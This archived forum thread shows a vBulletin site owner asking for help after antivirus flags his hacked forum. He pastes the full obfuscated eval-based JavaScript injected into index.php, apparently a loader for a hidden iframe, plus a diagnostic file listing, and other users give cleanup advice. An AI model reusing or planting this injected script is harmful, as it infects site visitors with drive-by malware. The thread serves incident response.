View Full Version : My Vb Forum got hacked?
Mark_Zuckerberg
03-13-2012, 09:54 PM
Hello All, My vbuletin forum got hacked or something like that when i open it in Firefox it gives error and not opens error is Trojan virus which my anti-virus detects and the site didn't opening. Screen-shot is attached with this please tell me what should i do Waiting for a help full reply.
GavoTrav
03-13-2012, 11:13 PM
Can you link me your site in a private message please? I'll check it out, Might only be your anti virus. or a malicious javascript file by the look of this
Mark_Zuckerberg
03-14-2012, 12:43 AM
Hello mate thank for your reply
when i have open up my c panel and saw my index.php file on line 1 there was a code
<script>if(window.document)aa=0+[];aaa='0';try{new"a".prototype}catch(hgberger){if(aa===aaa)
f=['-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71 z63z72z78z77z28z83z46z59z65z40z59z71z63z 2z1z60z73z62z83z1z3z53z10z55z3z85z-25z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-25z-29z-29z87z-6z63z70z77z63z-6z85z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z70z79z69z59z77z 78z76z73z83z8z67z72z9z71z59z67z72z8z74z6 6z74z25z74z59z65z63z23z19z19z12z10z11z12z10z14z62z 19z10z13z61z12z13z62z1z-6z81z67z62z78z66z23z1z11z10z1z-6z66z63z67z65z66z78z23z1z11z10z1z-6z77z78z83z70z63z23z1z80z67z77z67z60z67z70z67z78z8 3z20z66z67z62z62z63z72z21z74z73z77z67z78 z67z73z72z20z59z60z77z73z70z79z78z63z21z70z63z64z7 8z20z10z21z78z73z74z20z10z21z1z24z22z9z6 7z64z76z59z71z63z24z-4z3z21z-25z-29z-29z87z-25z-29z-29z64z79z72z61z78z67z73z72z-6z67z64z76z59z71z63z76z2z3z85z-25z-29z-29z-29z80z59z76z-6z64z-6z23z-6z62z73z61z79z71z63z72z78z8z61z76z63z59z78z63z31z7 0z63z71z63z72z78z2z1z67z64z76z59z71z63z1 z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1 z77z76z61z1z6z1z66z78z78z74z20z9z9z70z79 z69z59z77z78z76z73z83z8z67z72z9z71z59z67z72z8z74z6 6z74z25z74z59z65z63z23z19z19z12z10z11z12 z10z14z62z19z10z13z61z12z13z62z1z3z21z64z8z77z78z8 3z70z63z8z80z67z77z67z60z67z70z67z78z83z 23z1z66z67z62z62z63z72z1z21z64z8z77z78z83z70z63z8z 74z73z77z67z78z67z73z72z23z1z59z60z77z73 z70z79z78z63z1z21z64z8z77z78z83z70z63z8z70z63z64z7 8z23z1z10z1z21z64z8z77z78z83z70z63z8z78z 73z74z23z1z10z1z21z64z8z77z63z78z27z78z78z76z67z60 z79z78z63z2z1z81z67z62z78z66z1z6z1z11z10 z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2 z1z66z63z67z65z66z78z1z6z1z11z10z1z3z21z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z 63z72z78z77z28z83z46z59z65z40z59z71z63z2 z1z60z73z62z83z1z3z53z10z55z8z59z74z74z63z72z62z29 z66z67z70z62z2z64z3z21z-25z-29z-29z87'][0].split('z');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;609>i;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
i just closed that and i deleted the index.php file and uploded new one and it solved but when i try to log in it again gives error and virus of trojan then i deleted login.php and uploded new now its working fine and now i checked the files from my admin cp through
Maintenance -> Diagnostics -> Suspect File Versions Diagnostic.
and i got lots of files showing
File not recognized as part of vBulletin
What should i do know please guide me?
blind-eddie
03-14-2012, 02:43 AM
This very thing happened to me a while back.
Some how my host account password was lifted of my laptop due to a virus & I was hacked via FTP.
Login to your cpanel & check FTP sessions, if you are not using FTP, there should be none active. If there is one active that is not yours, terminate it.
Then change your host cpanel password. That will stop them from getting in.
Unfortunately you probably have many files on your site as well as other sites you may have in your domain space that are also effected.
Via FTP, look at the dates your files were last edited, if you know you did not edit that file on that date chances are that file is hacked.
You will have to look for the script code you posted above along with a second script code similar to the on above in your files.
I had 13 websites in my domain space at that time and all sites were effected. Took me a few days to fix everything.
I tried to download via FTP the files that were infected and was not able to open them, avast would not let me due to the script kiddies hack.
Hopefully you are not infected as bad as I was & don't trust the backups your host has for your site, it may be infected as well...mine was.
Good luck
Mark_Zuckerberg
03-14-2012, 08:43 AM
i have checked the files from my admin cp through
Maintenance -> Diagnostics -> Suspect File Versions Diagnostic. and i get this
Suspect File Versions
Scanned 96 files
./
6c2b1126bd.txt File not recognized as part of vBulletin
835_1812580611812.txt File not recognized as part of vBulletin
8e8838427e.txt File not recognized as part of vBulletin
BingSiteAuth.xml File not recognized as part of vBulletin
DnPMusicbox_Settings.php File not recognized as part of vBulletin
_vti_inf.html File not recognized as part of vBulletin
a9e8ff0b68.txt File not recognized as part of vBulletin
application-edit.php File not recognized as part of vBulletin
application-forms.php File not recognized as part of vBulletin
application-types.php File not recognized as part of vBulletin
arcade.php File not recognized as part of vBulletin
autotagger_ajax.php File not recognized as part of vBulletin
dmca.html File not recognized as part of vBulletin
dmca.php File not recognized as part of vBulletin
e4cf17e2ba.txt File not recognized as part of vBulletin
googlea5e48a7c037ebbfb.html File not recognized as part of vBulletin
holdsession.php File not recognized as part of vBulletin
htaccess.txt File not recognized as part of vBulletin
index.php File does not contain expected contents
inlinemod.php File version mismatch: found 3.8.2 , expected 3.8.7 Patch Level 2
license_agreement.html File not recognized as part of vBulletin
music.php File not recognized as part of vBulletin
musicajax.php File not recognized as part of vBulletin
mywot965f5badaddb3447282b.html File not recognized as part of vBulletin
oEs2A2OYQexnuOtU1SKiVB482olHqghI50z1mh2a8.txt File not recognized as part of vBulletin
post_thanks.php File not recognized as part of vBulletin
postinfo.html File not recognized as part of vBulletin
redir.php File not recognized as part of vBulletin
resim.php File not recognized as part of vBulletin
robots.txt File not recognized as part of vBulletin
showthread.php File does not contain expected contents
sitemap.xml File not recognized as part of vBulletin
thanks.php File not recognized as part of vBulletin
track.php File not recognized as part of vBulletin
u9KWHW4kg-mkyUi8KbfNqxCbuCg.html File not recognized as part of vBulletin
validator.php File not recognized as part of vBulletin
vbam_advertisement.php File not recognized as part of vBulletin
vbseocp.php File does not contain expected contents
vbseocpform.php File does not contain expected contents
webutationa15893f7ee230c87f250f6e0e494e30c.html File not recognized as part of vBulletin
y_key_c9998c819e5e9f06.html File not recognized as part of vBulletin
Scanned 3 files
./archive
Scanned 73 files
./benson
advappadmin.php File not recognized as part of vBulletin
arcade.php File not recognized as part of vBulletin
cseo.php File not recognized as part of vBulletin
dnpmusicbox_setting.php File not recognized as part of vBulletin
glowhostspamomatic.php File not recognized as part of vBulletin
post_thanks_admin.php File not recognized as part of vBulletin
propositions_autotaggerfromcontentandtitle.php File not recognized as part of vBulletin
read_pms.php File not recognized as part of vBulletin
read_pms_eng.php File not recognized as part of vBulletin
tags_autotaggerfromcontentandtitle.php File not recognized as part of vBulletin
thanks.php File not recognized as part of vBulletin
thanksimport.php File not recognized as part of vBulletin
vbam.php File not recognized as part of vBulletin
vboptimise.php File not recognized as part of vBulletin
Scanned 58 files
./clientscript
ncode_imageresizer.js File not recognized as part of vBulletin
post_thanks.js File not recognized as part of vBulletin
vbam.js File not recognized as part of vBulletin
vbam_uncrushed.js File not recognized as part of vBulletin
Scanned 4 files
./clientscript/yui
Scanned 2 files
./clientscript/yui/animation
Scanned 2 files
./clientscript/yui/connection
Scanned 2 files
./clientscript/yui/dragdrop
Scanned 2 files
./clientscript/yui/yahoo-dom-event
Scanned 11 files
./codx
Scanned 2 files
./images/regimage/fonts
Scanned 156 files
./includes
combineit.php File not recognized as part of vBulletin
config_vbseo.php File not recognized as part of vBulletin
cssmin.php File not recognized as part of vBulletin
functions_application-forms.php File not recognized as part of vBulletin
functions_autotagger.php File not recognized as part of vBulletin
functions_autotaggerfromcontentandtitle.php File not recognized as part of vBulletin
functions_cseo.php File not recognized as part of vBulletin
functions_cseo_archive.php File not recognized as part of vBulletin
functions_ghsom.php File not recognized as part of vBulletin
functions_post_thanks.php File not recognized as part of vBulletin
functions_vbseo.php File does not contain expected contents
functions_vbseo_startup.php File does not contain expected contents
php-min.php File not recognized as part of vBulletin
vbam_admin_functions.php File not recognized as part of vBulletin
vbam_functions.php File not recognized as part of vBulletin
Scanned 22 files
./includes/cron
ataggercontentandtitle_prop.php File not recognized as part of vBulletin
autotagger.php File not recognized as part of vBulletin
autotaggerfromcontentandtitle.php File not recognized as part of vBulletin
Scanned 8 files
./includes/paymentapi
Scanned 42 files
./includes/xml
bitfield_dbtech_thanks.xml File not recognized as part of vBulletin
bitfield_glowhostspamomatic.xml File not recognized as part of vBulletin
cpnav_advapp.xml File not recognized as part of vBulletin
cpnav_arcade.xml File not recognized as part of vBulletin
cpnav_autotaggerfromcontentandtitle.xml File not recognized as part of vBulletin
cpnav_clogicseo.xml File not recognized as part of vBulletin
cpnav_dbtech_thanks.xml File not recognized as part of vBulletin
cpnav_dnp_instantmusicbox.xml File not recognized as part of vBulletin
cpnav_glowhostspamomatic.xml File not recognized as part of vBulletin
cpnav_post_thanks.xml File not recognized as part of vBulletin
cpnav_rpm.xml File not recognized as part of vBulletin
cpnav_vbam.xml File not recognized as part of vBulletin
cpnav_vboptimise.xml File not recognized as part of vBulletin
hooks_advapp.xml File not recognized as part of vBulletin
hooks_dbtech_thanks.xml File not recognized as part of vBulletin
hooks_ibproarcade.xml File not recognized as part of vBulletin
hooks_post_thanks.xml File not recognized as part of vBulletin
product-ibproarcade.xml File not recognized as part of vBulletin
vbseocp_arabic.xml File not recognized as part of vBulletin
vbseocp_deutsch (du).xml File does not contain expected contents
vbseocp_deutsch (sie).xml File does not contain expected contents
vbseocp_dutch.xml File does not contain expected contents
vbseocp_english.xml File does not contain expected contents
vbseocp_italian.xml File not recognized as part of vBulletin
vbseocp_russian.xml File does not contain expected contents
vbseocp_turkce.xml File does not contain expected contents
Scanned 97 files
./install
Scanned 8 files
./vbseo_sitemap
extra-urls.txt File does not contain expected contents
index.php File does not contain expected contents
sitemap.xml File not recognized as part of vBulletin
sitemap.xsl File not found
What should i do know i also got a notice from Google to about this :( please help me and save my 3 years hard work :(
--------------- Added 1331717320 at 1331717320 ---------------
i replaced the files with the backup files and now when i clik dignosttics it show me some thing like this
application-edit.php File not recognized as part of vBulletin
application-forms.php File not recognized as part of vBulletin
application-types.php File not recognized as part of vBulletin
arcade.php File not recognized as part of vBulletin
arcadetourmnt.php File not recognized as part of vBulletin
autotagger_ajax.php File not recognized as part of vBulletin
before this when virus was there its showing
File does not contain expected contents please tell me that my virus got removed or not?
blind-eddie
03-19-2012, 11:28 AM
I can not tell you if the virus is gone or not, your attack could be different from the one I had.
As for the files list you posted not being part of vbulletin, most are from addons & is normal.
File does not contain expected contents
I to have this. After searching I came across a post made by Lynn on vbulletin.com.
https://www.vbulletin.com/forum/showthread.php/394965-quot-File-does-not-contain-expected-contents-quot-Error
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.